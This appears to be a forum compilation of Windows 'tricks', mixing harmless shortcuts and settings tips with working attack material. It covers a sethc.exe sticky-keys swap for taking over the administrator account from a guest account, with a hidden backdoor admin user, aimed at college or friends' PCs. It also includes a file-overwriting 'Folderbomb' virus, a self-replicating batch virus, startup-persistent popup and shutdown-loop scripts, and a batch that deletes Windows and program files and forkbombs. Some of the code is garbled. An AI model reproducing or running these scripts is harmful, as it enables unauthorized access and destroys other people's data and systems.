Tricks


Hack administrator from Guest account in XP

if u wanted to hack your college pc with guest account/student account so that you can download with full speed there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ?
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.


Prerequisites

Guest account with write access to system 32.

Here is how to do that -

Go to C:/windows/system32
Copy cmd.exe and paste it on desktop
rename cmd.exe to sethc.exe
Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

Now Log out from your guest account and at the user select window,press shift key 5 times.
Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.


Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
Congrats You have hacked admin from guest account.
Further..

Also, you can further create a new user at the command prompt by typing “NET USER SUSHIL490023 /ADD” where “SUSHIL490023” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever
========================================================================

Top 10 keyboard shortcuts everyone should know




Ctrl + C or Ctrl + Insert
copy the highlighted text or selected item.

Ctrl + V or Shift + Insert
Paste the text or object that's in the clipboard.

Ctrl + Z and Ctrl + Y
Undo any change. For example, if you cut text, pressing this will undo it. This can also often be pressed multiple times to undo multiple changes. Pressing Ctrl + Y would redo the undo.

Ctrl + F
Open the Find in any program. This includes your Internet browser to find text on the current page.

Alt + Tab or Alt + Esc
Quickly switch between open programs moving forward.
Press Ctrl + Tab to switch between tabs in a program.
Adding the Shift key to Alt + Tab or Ctrl + Tab will move backwards. For example, if you are pressing Alt + Tab and pass the program you want to switch to, press Alt + Shift + Tab to move backwards to that program.

Windows Vista and 7 users can also press the Windows Key + Tab to switch through open programs in a full screenshot of the Window.


Ctrl + Back space and Ctrl + Left arrow / Right arrow
Pressing Ctrl + Backspace will delete a full word at a time instead of a single character.
Holding down the Ctrl key while pressing the left or right arrow will move the cursor one word at a time instead of one character at a time. If you wanted to highlight one word at a time you can hold down Ctrl + Shift and then press the left or right arrow key to move one word at a time in that direction while highlighting each word.


Ctrl + S
While working on a document or other file in almost every program pressing Ctrl + S will save that file. This shortcut key should be used frequently anytime you're working on anything important.


Ctrl + Home / End
Move the cursor to the beginning or end of a document.

Ctrl + P
Print the page being viewed. For example, the document in Microsoft Word or the web page in your Internet browser.


Page Up / Space bar and Page Down
Pressing either the page up or page down key will move that page one page at a time in that direction. When browsing the Internet pressing the space bar will also move the page down one page at a time. If you press Shift and the Space bar the page will go up a page at a time. 

========================================================================



Reset Forgotten Windows Passwords




Use of password requires that you remember it. But there are solutions if you do not remember them.

Password is needed, and on most services where they are in use, there are solutions if you forget both your username and password.

User password:

If we are talking about a user password, you can log on as Administrator, open the Control Panel and go into the management of users and groups, and reset the password for that user account. It's very simple.

Bios password:

If someone has put a password in the BIOS, the machine will not start to load Widows until the password is entered. But there are several ways to reset this so that you get access to the machine.

There are a number of "backdoors" in the form of general password for the different PC manufacturers.You can find a list

 http://www.tech-faq.com/reset-bios-password.html

Another solution is to remove the battery if it sits in a holder, it is simple, if it is soldered, it is a little worse. All information stored in CMOS loses its content when it's not energized.

Admin password:

To create an administrator user you use as the default login and then forget the password is almost unforgivable. But it can happen.

The solution was to reinstall and start a new life, but there is a hack that can fix the problem. You do not have 100% guarantee.

The solution is to download a program - of course on another PC - which you put on a boot disk or memory plug and start up the locked machine.

The program will scan the disk and find the password, and give you the option to edit or delete it. It is recommended to delete the password and then eventually create a new in Windows when you get into the machine.

Program and detailed instructions can be found on this website

http://pogostick.net/%7Epnh/ntpasswd/
==========================================================================================


==Create a Small Virus For Yourself==
small virus in your "Local Disk Cor Your System Disk".
What Does This Do - It creates a Folder in a Folder in a Folder and so on......

How To Make It - Open Notepad, Copy The Code Below & Save as "anything.bat". Run it & Enjoy! 

Note - Run This On Your Own Responsibility, I am Not Responsible For Your 
Actions.


[QUOTE]#include
#include
#include
#include
#includevoid main(int argc,charargv[])
{ char buf[512];int source,target,byt,done;struct ffblk ffblk;clrscr();textcolor(2);cprintf(”————————————————————————–”);printf(”\nVirus: Folderbomb 1.0\nProgrammer:DL67(I am The Best on WJ)\n”);cprintf(”————————————————————————–”);done findfirst(”*.*”,&ffblk,0);while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);source=open(argv[0],O_RDONLYO_BINARY);target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)write(target,buf,byt);
else
break;
}close(source);close(target);done findnext(&ffblk);
}getch();
}[/QUOTE]
======================================================================
Make Firefox 7 to view the "http" field[/SIZE][/U]
[QUOTE]
To get back http, do this: 1. Type “about:config“ in the address bar and hit enter 2. Double-click on browser.urlbar.trimURLs preference and turn its value to false. Have fun! You can view http now.  It would show light gray coloring in address bar! TO get rid of this, do this: Set browser.urlbar.formatting.enabled to False in the above page
======================================================================
How to Download Torrents with IDM
  • [QUOTE] [/QUOTE]
[QUOTE]
  • Download torrent file from any torrent sites.
  • Go to [URL='http://www.torcache.net/']Torcache - Torrent Cache[/URL]
  • Now upload that torrent file that you have just downloaded and click on the cache button.
  • This will generate a new torrent link of your file just copy that link.
  • Now go to the [URL='http://www.torrific.com/']Download torrents from the web. Fast. Easy.[/URL] and get register there if you don’t have account otherwise login into your account.
  • In the text field paste that new torrent file that you have get in the 4th step and click on get button.
  • You will see all the torrent files that are present in that torrent . Click on initiate bittorrent transmission button.
  • Now all the files that are present in that torrent file will be available to download just click on any of the file that you want to download and IDM window will popup.
  • Now Start Downloading your file.
You should use this method only if you are getting very poor speed with your torrent client because if you download it with IDM the link will not be resumable and you have to finish it without breaking your internet connection. [/QUOTE]
======================================================================Keyboard Tricks (Very helpful at times)[/SIZE][/U]
[QUOTE]
Keyboard Tricks Are The Types Of Tricks Which Are Very Interesting Yet Very Rarely Found, I Have Added Some Of The Keyboard Tricks Which Are Really Helpful As Well As Enjoyable To me.
[QUOTE]Alt Key + Calculator Number = Symbol. To create the ® symbol Alt + 0174 = ® Alt Key + Number = Symbol 130 = é [accent over e ] 0176 = ° [degrees for Temperature] 0169 = © [Copyright] 0174 = ® [Registered Trademark] 0153 = ™ [Trade Mark] 155 = ¢ [cent sign] 156 = £ [Pound Sterling] 0165 = ¥ [Japanese Yen sign] 0128 = € [Euro symbol] 0190 = ¾ 171 = ½ 172 = ¼ 21 = § 144 = É [Capitalised accent over E] 241 = ± 246 = ÷ 174 = « 175 = » 225 = ß 135 = ç 137 = ë 132 = ä 160 = á 133 = à 136 = ê 15 = ¤ 170 = ¬ 159 = ƒ 146 = Æ 145 = æ 129 = ü 253 = ² [Square sign] 350 = ^ 352 = ` 382 = ~ 166 = ª 254 = ¦ 249 = · 152 = ÿ 142 = Ä 154 = Ü 230 = µ 0134 = † [dagger sign] 20 = ¶ 195 = + 194 = - 168 = ¿ 197 = + 0179 = ³ [cubic sign] 0161 = ¡ [/QUOTE]
======================================================================
Change Windows "AM & PM" Time Values!
[QUOTE]OK, Was DOing Some Shit on my PC and got this shit...  Now you can change the time values - "AM & PM" to whatever u like to..... By Following These Steps - XP Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM and PM fields from AM and PM to ur something u want to -> Click Apply Vista/7 Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Additional-Settings Button -> Go to TIME Tab -> Change AM and PM fields from AM and PM to ur something u want to -> Click Apply ----------- Enjoy This & Give Me Credits!
===============================================================
Trick #20 - How to Make a Folder Without Any Name[/SIZE][/U]
[QUOTE]While Many Of Us Know This But Just Writing This For The Ones Who Dont. just follow These Steps to make a folder without any name - 1. Right Click -> Create New Folder. 2. A New Folder Has Been Created, Select The Name Of The New Folder & Hit the Backspace Tab. 3. Now Press These keyboard buttons together - alt + 255 (Voila, You Have Just Created a folder without any name!)
======================================================================How to Update Windows OS Without Internet Connection[/SIZE][/U]
[QUOTE]You dont need an Internet connection to update your Windows OS, A software called - "autopatcher" can do it for you.
So lets start - 1. Goto a nearby cybercafe and download Autopatcher from [URL='http://www.softpedia.com/get/System/OS-Enhancements/AutoPatcher-Updater.shtml']here[/URL] 2. After downloading this software just install and run it. 3. It will prompt you to select the OS for which you want to download the updates and click on Next button. 4. Now Select your OS whether it is 32-bit or 64-bit supported. If it is 32-bit then select X86 otherwise select X64 and click on Next button. 5. A list of all updates for your OS will be shown. 6. Select all the Updates and click on Download button. 7. After finishing the download just copy/paste all the downloaded updates in your Pen Drive. 8. Now insert this Pendrive into your system for which you have downloaded all these updates and install them. -- Thats it! Your OS Has been updated
=====================================================================
The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or 
(don't tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs) 
 Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
end if 
 


======================================================================
next, we have a code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second.

Set wshShell =wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "{CAPSLOCK}" 
loop
(this code is vbs so save in note pad as whateveryouwant.vbs)
Now we have a batch file that pops up with repeating message boxes :Begin  msg * Hi  msg * Are you having fun?  msg * I am!  msg * Lets have fun together!  msg * since you are stuck reading msg * I am gonna tell you a story msg * bout a dumb guy named (victims name) msg * who just opened my batch msg * and got stuck listening to a story msg * from a computer msg * so he was opening up batches  msg * when one pops up with a cool msg msg * then it says "hi"  msg * Hi  msg * Are you having fun?  msg * I am!  msg * have fun playing with this one (insert victim) msg * Because you have been P-w-n-e-d with a capital "P" GOTO BEGIN 
(this code is bat so save in note pad as whateveryouwant.bat)

====================================================================
we now have a batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?
 
 @Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g
(this code is bat so save in note pad as whateveryouwant.bat)
now we have a batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec,  that would really make them mad)  
@echo off
Rundll32 user32,SwapMouseButton 
rundll32 keyboard,disable
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it
(this code is bat so save in note pad as whateveryouwant.bat)

batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one 
could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green


@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive 
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
assoc
assoc
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60
(this code is bat so save in note pad as whateveryouwant.bat)

====================================================================
this is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want
 
 Set wshshell = wscript.CreateObject("WScript.Shell") 
Wshshell.run "Notepad" 
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s" 

=====================================================================
This is a batch file "Virus" it does not actually do anything. it will just set off your anti virus
@echo off>nul.ViRuS if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop if "%1=="/ViRuS_FINDSELF goto ViRuS_findself if "%VOFF%=="T goto ViRuS_OLDBAT set ViRuSname=%0 if not exist %0.bat call %0 /ViRuS_FINDSELF %path% if not exist %ViRuSname%.bat set ViRuSname= if "%ViRuSname%==" goto ViRuS_OLDBAT rem ViRuS if batch is started with name.BAT, virus will not become active rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable) rem ViRuS also if batch was only in an append /x:on path (chance=minimal) attrib +h %ViRuSname%.bat for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a attrib -h %ViRuSname%.bat set ViRuSname= goto ViRuS_OLDBAT :ViRuS_findself if "%2==" goto XXX_END>nul.ViRuS if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname% if exist %ViRuSname%.bat goto XXX_END if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname% if exist %ViRuSname%.bat goto XXX_END shift>nul.ViRuS goto ViRuS_findself :ViRuS_outer_loop for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a goto XXX_END>nul.ViRuS ViRuS_multiply find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat echo :XXX_END>>xViRuSx.bat copy xViRuSx.bat %2>nul del xViRuSx.bat goto XXX_END>nul.ViRuS :ViRuS_OLDBAT echo on>nul.ViRuS echo This is the dummy Virus Created Mason(pkk) :XXX_END  

======================================================================
this is a VBS code that each time you pree the letter "E", it will close without saving, the reason "E" was chosen is because E is the most common used letter 
in the english language. 
 Open MS Word And Press F11, To Open The MS Vbs Editor. Then input this
Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE), KeyCategory:=wdKeyCategoryCommand, _
Command:=”TestKeybinding”
End Sub

Sub TestKeybinding()
Dim x As Document
Set x = ActiveDocument
x.Close (False)
End Sub 


=====================================================================
This code is batch and it creates hundreds (or however many you want) of directories

@echo off
title Program Adobe Reader 8
:a
:1
@echo off
echo download all files of program "Microsoft Word"? y or n
echo y=yes 
echo n=no
set input=
set /p input=enter your option:
if %input%==y goto :n
if %input%==n goto :n
:n
pause
color 40
echo Please Wait One Moment(this may take a minute)
echo downloading
md.urmuty56u
md.o,mryumu
md.rjyu56
md.u5jjum,u
md.y4mt,ry6
md.76yutuu
md.4y,mm56
md.ejy,rut5u6
md.mjyumyuu
md.lyumtr56
md.68mr9uumr
md.ojyt56
md.6mrrnmtu
md.jtu6ryu56hy
md.oryimu,rty
md.74,n6
md.ujryitmu
md.fyhyi,huu6
md.nv,mryu6
md.j,yimntu
md.m5yinmu6rt
md. n,nmr6
md.fh,yiu65u66uu
md.djtyiu6mtur 6u
md.ni,t66u56
md.ry,yhyu66u
md.jynth6y46u
md.trn,ymir,hethy444
md.gethgethteht
md.tyjhtyju7ytju7u
md.787876ujytj
md.7u577
md.rhytru5uuuuuu788uuuuu45
md. 6ty rtyr etty
md.tyyo
md.rytryrtthrrrrytrh 
md.ryrtytrytit
md.6yyyyyyyyyyyyyiiiiyyyyyytryt
md.htrhwrthrthii
md.trhtrhtrt
md.htehtrht
md.iiii677i76457uiui57iiii677i76457uiu
md.iiii677i76457uiui574346t34t341t
md.iiii677i76457uiui57iiii657uiui57423
md.iiii677i76457uiui57iiii677i76iui57
md.iiii677i76gtmjmto
md.iiii677i7645yoi
md.iiii677i76457gjjgggggfffh
md.uiuiuiuiuiuiuiuiuiuuuuuug
md.uitur5ur
md.itt69
md.tu9toto
md.7jt58iot
md.7iui789
md.iui9oty
md.7u68
md.76iio89o
md.76iiii768
md.iu7i7ui7ioi
md.6t6i5i7oio
md.7iu776i7io
md.iiii677i764io57uiui57
md.j6ii6irt7i
md.iyh7i7tyjti
md.76uiy7i67
md.67tthujy6j6i
md.ituu7i7y76uyty
md.7j67u6ui
md.ryjtytj7ryij
md.jyyi7jut
md.ryj7y
md.ry7ijyj
md.jyiotyi
md.jhjryiio
md.ryyj7
md.854/y*7ui
md.57484ju7/854545814547
md.76i45/io
md.7458t
md.u7j45u7
md.5645778yu
md.68478yui
md.yhj558
md.hjr8798789
md.ry56875
md.hj65ui
md.try3154
md.dfj1254
md.nb0254
md.b0254
md.n412054
md.njfh442124
md.545
md.g124dh45
md.thet2hth5
md.8yyg5124e554
md.8egherg245
md.5+ethget4502
md.5+ghtd12
md.-bgddhd
md.+5ghd
md.85gh
md.8-+dgh
md./8+dgh
md.+dg
md.+8hd
md.-8ghh
md.7498dgh
md./*7897*dhadgh
md.7/87daggad
md.48dfgadf
md.9gdfag
md./94dghd
md.84tydgaha
md.876yty84/7dgha
md.itytthadg
md.uutuythdg
md.iyyyhdg
md.turttyythdghytyt
md.yutywtyetyydg
md.iyu8yuiitujkhad
md.yujikythad
md.iyuyghadg
md.886ytyuihadg
md.iuykithdg
md.68jkyytuihdguy
md.5689yth
md.689ygh
md.94ytty5ghyety
md.jutrjtutryjghdg796
md.jujutr58jtyh
md.ujtrj6ty
md.tjuty
md.jtujjrtyuj
md.jttuyuttyrr
md.tujtujurty
md.jtrjjtry
md.tuutry
md.tujjrry
md.tyjjjr
md.jtuuyr
md.yttujjyur
md.tyjjuruy
md.jjtujuy
md.yytuuutyujt
md.jtjjuuty
md.yjtuujjtu
md.jtyjrujtu
md.hjyjjtrjjutjt
md.jyutuujth
md.yyjjuurjjgh
md.5tujuuujutjghru7u
md.8urjjjgh
md.57ujujgh
md.58jujdgbs
md.87rujh
md.75jrujrhu
md.8tjrjruughrjurj
md.3urjrrrjhg
md.8jrjjh
md.58j57gj
md.78urjghj
md8.78jr
md.835ghj
md.7ugh
md.6787j
md.76u7ghjghgh8
md.t78jjj
md.78j5gghjjkgh7u
md.7t8jggh
md.8j7ghjjj
md.768ghjhgjghjg
md.8ty7gh
md.7j8jjhj
md.8thghhjyyjh577
md.7j7uhjuhjh
md.78t75hgjghj
md.jyyyuh8ghj
md.8tfgghj
md.76ghh
md.88fghjgh
md.7576j
md.837itghj87uitu
md.8376gh
md.85j8j
md.57tyhgj67
md.82j8hg
md.57dgt6jgh7
md.578j5678j
md.8gfj78hj
md.75t56
md.578yuhji
md.7528hj
md.78u6i
md.78t7i67j
md.56jtuh5tuiii6
md.57387jt87j6
md.274674ri6tu725767678
md.hjtj8i
md.wrtuyi6859
md.jtrrhji
md.tyjthtuyu68
md.yjterynikhjty
md.jyjtjtyuyk

======================================================================
batch sends you every pop up I've encountered 
 @echo off
mkdir C:SYSTEM
copy %0 "c:systemwinsys32.bat
ATTRIB +H +S c:systemwinsys32.bat
copy %0 "c:systemft32.bat
ATTRIB +H +S c:systemft32.bat
copy %0 "c:/Documents and SettingsAll UsersStart MenuProgramsStartup
AT 9:00AM "c:systemwinsys32.bat"
AT 9:30AM "c:systemwinsys32.bat"
AT 10:00AM "c:systemwinsys32.bat"
AT 10:30AM "c:systemwinsys32.bat"
AT 11:00AM "c:systemwinsys32.bat"
AT 11:30AM "c:systemwinsys32.bat"
AT 12:00PM "c:systemwinsys32.bat"
AT 12:30PM "c:systemwinsys32.bat"
AT 1:00PM "c:systemwinsys32.bat"
AT 1:30PM "c:systemwinsys32.bat"
AT 2:00PM "c:systemwinsys32.bat"
AT 2:30PM "c:systemwinsys32.bat"
AT 3:00PM "c:systemwinsys32.bat"
AT 3:30PM "c:systemwinsys32.bat"
AT 4:00PM "c:systemwinsys32.bat"
AT 4:30PM "c:systemwinsys32.bat"
AT 5:00PM "c:systemwinsys32.bat"
AT 5:30PM "c:systemwinsys32.bat"
AT 6:00PM "c:systemwinsys32.bat"
start iexplore http://www.screensavers.com/landing/3d.html?banner=sea_prop_398x394&aff_id=fastclick
start iexplore http://www.screensaver.com/720x300pop2.html?f=ssavercom
start iexplore http://www.roar.com/client/?sh=47843&to=425&do=2356
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php
start iexplore http://consumerpromotioncenter.com/?cid=cKb4OYl+9DE&u=bb3ba267dcf418089a155b8ca8c35aa0&=&zipcode=
start iexplore http://geo.precisionclick.com/ad/?typ=1&pub=1&site=1589&adfmt=3&aid=0&sid=0&cat=0&sub=0&pop=&tloc=False&click=&ipr=&ref=81939389352424928477788287997834239391828988772376888624&ccb=73783273
start iexplore http://www.megawealthy.com/488/
start iexplore http://b.casalemedia.com/V2/45086/51808/index.html?www.milliondollahhomepage.com/
start iexplore http://www.everyfreegift.com/landings/efg_land_main01.jsp?product_id=2116&pid=1844165918&cid=2116
start iexplore http://goldenpalace.com/playnow_aff_no_poker.php?member=xorfl&profile=mdh&banner=&t=0&creferer=&referer=
start iexplore http://www.screensavers.com/landing/3d.html?banner=sea_prop_398x394&aff_id=fastclick
start iexplore http://www.screensaver.com/720x300pop2.html?f=ssavercom
start iexplore http://www.roar.com/client/?sh=47843&to=425&do=2356
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php
start iexplore http://consumerpromotioncenter.com/?cid=cKb4OYl+9DE&u=bb3ba267dcf418089a155b8ca8c35aa0&=&zipcode=
start iexplore http://geo.precisionclick.com/ad/?typ=1&pub=1&site=1589&adfmt=3&aid=0&sid=0&cat=0&sub=0&pop=&tloc=False&click=&ipr=&ref=81939389352424928477788287997834239391828988772376888624&ccb=73783273
start iexplore http://www.megawealthy.com/488/
start iexplore http://b.casalemedia.com/V2/45086/51808/index.html?www.milliondollahhomepage.com/
start iexplore http://www.everyfreegift.com/landings/efg_land_main01.jsp?product_id=2116&pid=1844165918&cid=2116
start iexplore http://goldenpalace.com/playnow_aff_no_poker.php?member=xorfl&profile=mdh&banner=&t=0&creferer=&referer=
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php
start iexplore http://consumerpromotioncenter.com/?cid=cKb4OYl+9DE&u=bb3ba267dcf418089a155b8ca8c35aa0&=&zipcode=
start iexplore http://geo.precisionclick.com/ad/?typ=1&pub=1&site=1589&adfmt=3&aid=0&sid=0&cat=0&sub=0&pop=&tloc=False&click=&ipr=&ref=81939389352424928477788287997834239391828988772376888624&ccb=73783273
start iexplore http://www.megawealthy.com/488/
start iexplore http://b.casalemedia.com/V2/45086/51808/index.html?www.milliondollahhomepage.com/
start iexplore http://www.everyfreegift.com/landings/efg_land_main01.jsp?product_id=2116&pid=1844165918&cid=2116
start iexplore http://goldenpalace.com/playnow_aff_no_poker.php?member=xorfl&profile=mdh&banner=&t=0&creferer=&referer=
start iexplore http://www.screensavers.com/landing/3d.html?banner=sea_prop_398x394&aff_id=fastclick
start iexplore http://www.screensaver.com/720x300pop2.html?f=ssavercom
start iexplore http://www.roar.com/client/?sh=47843&to=425&do=2356
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php 

======================================================================
This is a simple Batch example on some of the colors you can change the txt to in dos

@echo off
color %num%
:start
cls
COLOR %num%
ECHO Green = 1
ECHO Red = 2
ECHO Yellow = 3
ECHO Aqua = 4
ECHO Purple = 5
ECHO White = 6
ECHO Blue = 7
ECHO Gray = 8
ECHO.
SET/P color=Enter Color:
IF "%color%" equ "1" goto 1
IF "%color%" equ "2" goto 2
IF "%color%" equ "3" goto 3
IF "%color%" equ "4" goto 4
IF "%color%" equ "5" goto 5
IF "%color%" equ "6" goto 6
IF "%color%" equ "7" goto 7
IF "%color%" equ "8" goto 8
IF "%color%" equ "exit" goto end
IF "%color%" equ "%color%" goto error
:1
set num=a
goto start
:2
set num=c
goto start
:3
set num=e
goto start
:4
set num=B
goto start
:5
set num=D
goto start
:6
set num=F
goto start
:7
set num=9
goto start
:8 
set num=8
goto start:error
cls
color 0
ECHO That is not a Valid Color
echo.
pause
goto start


===============================================================================
Cool batch file to lock and disguise a folder
Move any files you want to be hidden in your locker, double click the bat again and you will be asked to lock when the folder is locked it will dissapear
to unlock the folder double click the bat file enter any pass. or make up one of your own and input it into the code

@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>" 
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


<br>
Batch that kills and deletes the windows directory, and all .txt .exe .bat and .ini files then forkbombs your computer
@echo off kill %windir% del %windir% del *.txt del *.exe del *.bat del *.ini :ok start, cmd Goto ok <br>
Erases hard drive then shuts down the comp:


hdmemory/release
echo total hard drive erased
echo Do not use on anyone
shutdown -r -f -t0
======================================================================
Batch file that each time they reboot, their computer shuts down again in 5 seconds. So you wouldn't want to do this to an unexperienced user, lol

@echo off
echo shutdown -s -t 5 -c "Windows is shutting down due to an internal error" > C:\close.bat
copy C:\close.bat "C:\documents and settings\all users\start menu\programs\startup\"
cls
echo Maximize this window to continue
